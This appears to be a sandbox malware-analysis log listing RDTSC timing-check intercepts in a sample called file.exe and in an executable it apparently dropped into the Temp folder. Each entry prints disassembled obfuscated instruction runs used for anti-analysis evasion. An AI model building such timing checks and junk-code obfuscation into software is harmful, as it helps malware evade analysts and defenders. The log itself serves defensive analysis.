Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20383 second address: 4D20419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub ebx, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9D4900D0CBh 0x00000010 adc si, C8AEh 0x00000015 jmp 00007F9D4900D0D9h 0x0000001a popfd 0x0000001b pushad 0x0000001c push eax 0x0000001d pop edx 0x0000001e pushfd 0x0000001f jmp 00007F9D4900D0CAh 0x00000024 adc cl, 00000028h 0x00000027 jmp 00007F9D4900D0CBh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f sub edi, edi 0x00000031 jmp 00007F9D4900D0CFh 0x00000036 inc ebx 0x00000037 pushad 0x00000038 mov esi, ebx 0x0000003a popad 0x0000003b test al, al 0x0000003d jmp 00007F9D4900D0CDh 0x00000042 je 00007F9D4900D298h 0x00000048 jmp 00007F9D4900D0CEh 0x0000004d lea ecx, dword ptr [ebp-14h] 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20419 second address: 4D2041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2041D second address: 4D20423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204D8 second address: 4D204DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204DC second address: 4D204E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204E2 second address: 4D20504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9D493C17CAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20504 second address: 4D2050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2050A second address: 4D20510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20510 second address: 4D20514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20514 second address: 4D2052F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F9DBA13F736h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 8434h 0x00000015 mov edi, 6304AFA0h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2052F second address: 4D20573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F9D4900D14Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F9D4900D0CDh 0x00000017 pop eax 0x00000018 call 00007F9D4900D0D1h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20573 second address: 4D20584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D493C17CDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20584 second address: 4D205AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-14h], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9D4900D0CDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205AD second address: 4D205B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205B3 second address: 4D205B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D205B7 second address: 4D20676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F9DBA13F6A2h 0x0000000e jmp 00007F9D493C17CFh 0x00000013 mov ebx, dword ptr [ebp+08h] 0x00000016 jmp 00007F9D493C17D6h 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e jmp 00007F9D493C17D0h 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F9D493C17CEh 0x0000002b adc ch, FFFFFFC8h 0x0000002e jmp 00007F9D493C17CBh 0x00000033 popfd 0x00000034 jmp 00007F9D493C17D8h 0x00000039 popad 0x0000003a push eax 0x0000003b jmp 00007F9D493C17CBh 0x00000040 xchg eax, esi 0x00000041 jmp 00007F9D493C17D6h 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F9D493C17D7h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20676 second address: 4D2067D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2067D second address: 4D2069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D493C17D7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2069E second address: 4D206D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9D4900D0D6h 0x00000014 sub ecx, 720701A8h 0x0000001a jmp 00007F9D4900D0CBh 0x0000001f popfd 0x00000020 mov bl, ah 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206D8 second address: 4D206DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D206DE second address: 4D20710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F9D4900D0D4h 0x00000012 sbb ax, EF38h 0x00000017 jmp 00007F9D4900D0CBh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20710 second address: 4D20763 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9D493C17D8h 0x00000008 add esi, 5A246998h 0x0000000e jmp 00007F9D493C17CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 movzx ecx, bx 0x0000001a push edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, edx 0x00000024 jmp 00007F9D493C17D5h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20763 second address: 4D2078F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f call 00007F9D4900D0CFh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2078F second address: 4D20795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207B8 second address: 4D207BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207BE second address: 4D207C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207C2 second address: 4D207C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207C6 second address: 4D207ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 26C4FACFh 0x00000012 jmp 00007F9D493C17D4h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D207ED second address: 4D20815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D4900D0D5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20815 second address: 4D10E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9DBA13F5F1h 0x0000000f xor eax, eax 0x00000011 jmp 00007F9D4939AEFAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F9D493C17C7h 0x0000002b jmp 00007F9D493C193Bh 0x00000030 call 00007F9D4D36B7FCh 0x00000035 mov edi, edi 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F9D493C17D0h 0x0000003e xor si, 60B8h 0x00000043 jmp 00007F9D493C17CBh 0x00000048 popfd 0x00000049 popad 0x0000004a xchg eax, ebp 0x0000004b jmp 00007F9D493C17D6h 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F9D493C17D1h 0x00000057 push esi 0x00000058 pushfd 0x00000059 jmp 00007F9D493C17D7h 0x0000005e xor cx, F48Eh 0x00000063 jmp 00007F9D493C17D9h 0x00000068 popfd 0x00000069 pop eax 0x0000006a popad 0x0000006b xchg eax, ebp 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10E28 second address: 4D10E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10E2E second address: 4D10E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D493C17D1h 0x00000009 xor esi, 760C5776h 0x0000000f jmp 00007F9D493C17D1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10E5D second address: 4D10E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10E6C second address: 4D10E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10E72 second address: 4D10F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9D4900D0CEh 0x00000008 pop esi 0x00000009 movsx edi, ax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov ebx, eax 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F9D4900D0D7h 0x0000001f add esi, 57F892BEh 0x00000025 jmp 00007F9D4900D0D9h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F9D4900D0D0h 0x00000031 add eax, 1A7773B8h 0x00000037 jmp 00007F9D4900D0CBh 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, ecx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F9D4900D0D4h 0x00000046 sub si, 2E18h 0x0000004b jmp 00007F9D4900D0CBh 0x00000050 popfd 0x00000051 push eax 0x00000052 mov ebx, 7CBC033Ah 0x00000057 pop edx 0x00000058 popad 0x00000059 mov dword ptr [ebp-04h], 55534552h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F9D4900D0CDh 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D10F36 second address: 4D10F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20C8E second address: 4D20C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20C92 second address: 4D20C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20C98 second address: 4D20D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, F2C9h 0x00000007 pushfd 0x00000008 jmp 00007F9D4900D0D6h 0x0000000d sub ch, 00000018h 0x00000010 jmp 00007F9D4900D0CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov ax, 70EBh 0x0000001f call 00007F9D4900D0D0h 0x00000024 mov di, cx 0x00000027 pop ecx 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007F9D4900D0CDh 0x00000030 cmp dword ptr [75AF459Ch], 05h 0x00000037 jmp 00007F9D4900D0CEh 0x0000003c je 00007F9DB9D7ADBEh 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D13 second address: 4D20D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D65 second address: 4D20D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D6B second address: 4D20D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D6F second address: 4D20D73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D73 second address: 4D20D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 0EC2BBFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D493C17D8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20D9C second address: 4D20DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F9DB9D81E8Dh 0x0000000e push 75A92B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AF4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20DB6 second address: 4D20DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20DBA second address: 4D20DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20DC0 second address: 4D20DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D493C17D8h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20DE8 second address: 4D20DEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20E5A second address: 4D20EAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9D493C17D4h 0x00000014 add esi, 10798868h 0x0000001a jmp 00007F9D493C17CBh 0x0000001f popfd 0x00000020 popad 0x00000021 je 00007F9DBA1252BBh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F9D493C17D5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20EAD second address: 4D20F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D4900D0D7h 0x00000009 sbb si, B90Eh 0x0000000e jmp 00007F9D4900D0D9h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [ebp+08h], 00002000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9D4900D0D6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20F0C second address: 4D20F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D493C17D1h 0x00000009 add eax, 3300DEA6h 0x0000000f jmp 00007F9D493C17D1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40855 second address: 4D4085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4085B second address: 4D40899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 5Ch 0x0000000c pushfd 0x0000000d jmp 00007F9D493C17D1h 0x00000012 add esi, 1CE164B6h 0x00000018 jmp 00007F9D493C17D1h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov eax, edi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40899 second address: 4D4089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4089F second address: 4D408C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9D493C17D9h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D408C8 second address: 4D408CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D408CC second address: 4D408DA instructions: 0x00000000 rdtsc 0x00000002 mov esi, 5980E86Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b movzx ecx, bx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D408DA second address: 4D40912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push edi 0x00000008 movzx esi, di 0x0000000b pop edx 0x0000000c pushfd 0x0000000d jmp 00007F9D4900D0CEh 0x00000012 add ax, 83C8h 0x00000017 jmp 00007F9D4900D0CBh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bx, CA36h 0x00000026 mov dl, 53h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40912 second address: 4D409E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 99h 0x00000005 pushfd 0x00000006 jmp 00007F9D493C17D0h 0x0000000b or si, C958h 0x00000010 jmp 00007F9D493C17CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [ebp+0Ch] 0x0000001c jmp 00007F9D493C17D6h 0x00000021 test esi, esi 0x00000023 jmp 00007F9D493C17D0h 0x00000028 je 00007F9DBA10F216h 0x0000002e pushad 0x0000002f mov ecx, 19B9C03Dh 0x00000034 pushfd 0x00000035 jmp 00007F9D493C17CAh 0x0000003a xor si, 8E18h 0x0000003f jmp 00007F9D493C17CBh 0x00000044 popfd 0x00000045 popad 0x00000046 cmp dword ptr [75AF459Ch], 05h 0x0000004d pushad 0x0000004e mov edx, ecx 0x00000050 mov ecx, 558F8BC7h 0x00000055 popad 0x00000056 je 00007F9DBA1272BDh 0x0000005c pushad 0x0000005d pushfd 0x0000005e jmp 00007F9D493C17D8h 0x00000063 or esi, 6A046FA8h 0x00000069 jmp 00007F9D493C17CBh 0x0000006e popfd 0x0000006f mov bh, al 0x00000071 popad 0x00000072 push ebx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F9D493C17CAh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D409E4 second address: 4D409EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D409EA second address: 4D40A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40A04 second address: 4D40A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D40AC7 second address: 4D40AE5 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 mov bh, 52h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F9D493C17CAh 0x00000014 pop ecx 0x00000015 movsx ebx, cx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: A6E49A second address: A6E4D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007F9D4900D0C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F9D4900D0D5h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9D4900D0D3h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: A6DD46 second address: A6DD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BECFE6 second address: BECFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
